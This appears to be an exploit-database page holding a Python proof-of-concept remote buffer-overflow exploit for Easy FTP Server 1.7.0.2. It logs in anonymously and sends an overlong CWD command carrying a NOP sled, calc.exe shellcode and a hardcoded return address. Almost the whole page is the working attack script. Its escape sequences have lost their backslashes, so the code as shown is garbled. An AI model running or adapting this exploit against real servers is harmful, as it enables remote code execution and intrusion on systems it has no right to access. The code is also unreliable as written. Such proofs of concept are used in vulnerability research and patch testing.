[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Easy FTP Server v1.7.0.2 CWD Remote BoF
# Published : 2010-02-22
# Author : athleet
# Previous Title : Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
# Next Title : ProSSHD v1.2 20090726 Buffer Overflow Exploit
# Tested on: XP SP3 (Eng)
#!/usr/bin/python
import socket, sys
print """
*************************************************
* Easy FTP Server 1.7.0.2 Remote BoF *
* Discovered by: athleet *
* jonbutler88[at]googlemail[dot]com *
*************************************************
"""
if len(sys.argv) != 3:
print "Usage: ./easyftp.py <Target IP> <Port>"
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
# Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng)
#
# B *0X009AFE44
#
shellcode = (
"xbax20xf0xfdx7f" # MOV EDX,7FFDF020
"xc7x02x4cxaaxf8x77" # MOV DWORD PTR DS:[EDX],77F8AA4C
"x33xC0" # XOR EAX,EAX
"x50" # PUSH EAX
"x68x63x61x6Cx63" # PUSH 636C6163
"x54" # PUSH ESP
"x5B" # POP EBX
"x50" # PUSH EAX
"x53" # PUSH EBX
"xB9xC7x93xC2x77" # MOV ECX,77C293C7
"xFFxD1" # CALL ECX
"xEBxF7" # JMP SHORT 009AFE5B
)
nopsled = "x90" * (268 - len(shellcode))
ret = "x58xFDx9Ax00"
payload = nopsled + shellcode + ret # 272 bytes
print "[+] Launching exploit against " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((target, port))
print "[+] Connected!"
except:
print "[!] Connection failed!"
sys.exit(0)
s.recv(1024)
s.send('USER anonymousrn')
s.recv(1024)
s.send('PASS anonymousrn')
s.recv(1024)
# Send payload...
print "[+] Sending payload..."
s.send('CWD ' + payload + 'rn')
try:
s.recv(1024)
print "[!] Exploit failed..."
except:
print "[+] Exploited ^_^"